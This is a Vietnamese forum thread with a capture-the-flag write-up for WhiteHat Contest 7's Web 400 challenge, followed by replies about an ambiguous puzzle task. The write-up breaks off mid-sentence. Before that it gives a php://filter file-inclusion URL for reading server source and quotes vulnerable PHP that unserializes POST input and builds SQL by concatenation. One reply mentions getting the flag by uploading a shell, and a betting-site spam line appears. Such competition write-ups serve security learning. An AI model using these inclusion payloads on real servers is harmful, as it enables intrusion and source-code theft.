[WriteUp] WhiteHat Contest lần 7

[DCT_94]

WEB 400 :

Ta thấy đường link đến about có chút khác biệt so với index và regiser, có thể đây là hint cho file inclusion vulnerability

http://123.30.245.77/index.php?field=about.php

Tham khảo tại đây :

http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

Ta có thể đọc được source của các file trên server (base64 encoded):

http://123.30.245.77/index.php?field=php://filter/read=convert.base64-encode/resource=index.php

Khi view source file about.php, để ý thấy có 1 dòng comment nhìn khá giống base64 encode. Bạn nào giải được challenge crypto ở WH #6 thì chắc nhận ra đây là base32 encode. Decode ra ta được 4dm1n_l0g1n_1.php.


Truy cập vào http://123.30.245.77/4dm1n_l0g1n_1.php thì được yêu cầu nhập groupcode. Thử nhập bừa thì server quăng về 1 câu rất phũ "Noob" =="


View source file này, ta để ý có đoạn:

    if(isset($_SESSION['username']) and isset($_POST["groupCode"]) and isset($_POST["data"])){

        include ('key/secretK3y.php');

        $groupCode = $_POST["groupCode"];

        @$data = unserialize($_POST["data"]);

        

        if ($data == md5($secret)){

            $db_username="user7";

            $db_password="user7";

            $database="whitehat_ctf";

            $username = $_SESSION['username'];



            @$con=mysqli_connect('127.0.0.1', $db_username, $db_password, $database) or die("Unable to connect database");

            @$query = mysqli_query($con, "UPDATE users SET role=1 WHERE username='$username'") or die("Error on database");

            mysqli_close($con);

            $fa=1;

        }

        else

            $fa=2;

    }

và

 

Re: [WriteUp] WhiteHat Contest lần 7

Thực ra bài web400 có 1 cách khác để getflag bằng cách ........... up shell
bạn nào quan tâm thì vào đây xem http://peternguyen.uns.vn/2014/07/19/write-up-ctf-whitehat-contest-lan-7-web-400/

 

Vào: Dafabet - H8VN - W88

 

Re: [WriteUp] WhiteHat Contest lần 7

BTC vẫn chưa công bố kết quả cuộc thi, tuy nhiên mình muốn hỏi là bài 300 dựa vào đâu để biết đáp án là đúng, có tuân theo mệnh đề hay chứng minh gì không, liệu chỉ có 1 cách xếp hay nhiều cách xếp, có một đáp án hay nhiều đáp án

 

Re: [WriteUp] WhiteHat Contest lần 7

Mình cũng có thắc mắc giống yeuchimse! Bài "Đào giếng" này nếu thay đổi thứ tự các vòng tròn ngoài thì có ra kết quả không và nếu có thì kết quả có khác không?!

 

Re: [WriteUp] WhiteHat Contest lần 7

BTC vẫn chưa công bố kết quả cuộc thi, tuy nhiên mình muốn hỏi là bài 300 dựa vào đâu để biết đáp án là đúng, có tuân theo mệnh đề hay chứng minh gì không, liệu chỉ có 1 cách xếp hay nhiều cách xếp, có một đáp án hay nhiều đáp án

Chuẩn đấy thánh, bài này đề ko chuẩn lắm. Nếu sắp xếp theo thứ tự 1->n thì đúng với đáp án, mình cũng làm theo cách này. Ý của tác giả đây chắc là để luyện tư duy, code theo kiểu chặt nhị phân thôi. Còn về yêu cầu bài toán là sắp xếp sao cho tìm được bán kính giếng là nhỏ nhất, mình thấy có khá nhiều cách có bán kính nhỏ hơn nữa, để bán kính là nhỏ nhất thì cần đưa về 1 bài toán khá là phức tạp nữa khi đó bài này không phải là 300đ nữa mà là 1000đ mới hợp lý :-D. Còn về ý của Yêu chim sẻ thì nên tin học hoá tí, có nghĩa là cần tương đối thôi ) góc tầm 359 độ thì tạm chấp nhận là 360 độ

 

Re: [WriteUp] WhiteHat Contest lần 7

Whitehat dạo này nhạt nhỉ, phong cách ra đề vẫn như cũ... :3

 

Re: [WriteUp] WhiteHat Contest lần 7

Thay mặt BTC, mình xin trả lời câu hỏi của các bạn về bài 300 như sau:
Trong bài này, nếu sắp xếp các vòng tròn theo các thứ tự khác nhau thì vẫn sẽ có kết quả, nhưng có thể kết quả sẽ khác nhau.
Ý tưởng ban đầu của BTC là sắp xếp các vòng tròn theo thứ tự từ 1 đến N, nhưng trong đề đã chưa nêu rõ được điều này.
BTC cảm ơn ý kiến của các bạn và sẽ chú ý rút kinh nghiệm để hoàn thiện hơn trong các đề thi tiếp theo.

BTC vẫn chưa công bố kết quả cuộc thi, tuy nhiên mình muốn hỏi là bài 300 dựa vào đâu để biết đáp án là đúng, có tuân theo mệnh đề hay chứng minh gì không, liệu chỉ có 1 cách xếp hay nhiều cách xếp, có một đáp án hay nhiều đáp án

Mình cũng có thắc mắc giống yeuchimse! Bài "Đào giếng" này nếu thay đổi thứ tự các vòng tròn ngoài thì có ra kết quả không và nếu có thì kết quả có khác không?!

Chuẩn đấy thánh, bài này đề ko chuẩn lắm. Nếu sắp xếp theo thứ tự 1->n thì đúng với đáp án, mình cũng làm theo cách này. Ý của tác giả đây chắc là để luyện tư duy, code theo kiểu chặt nhị phân thôi. Còn về yêu cầu bài toán là sắp xếp sao cho tìm được bán kính giếng là nhỏ nhất, mình thấy có khá nhiều cách có bán kính nhỏ hơn nữa, để bán kính là nhỏ nhất thì cần đưa về 1 bài toán khá là phức tạp nữa khi đó bài này không phải là 300đ nữa mà là 1000đ mới hợp lý :-D. Còn về ý của Yêu chim sẻ thì nên tin học hoá tí, có nghĩa là cần tương đối thôi ) góc tầm 359 độ thì tạm chấp nhận là 360 độ

 

Re: [WriteUp] WhiteHat Contest lần 7

Rút gì mà rút, nếu không có bài đó thì gấu mình (moitinhdau) về nhất mà T_T

j/k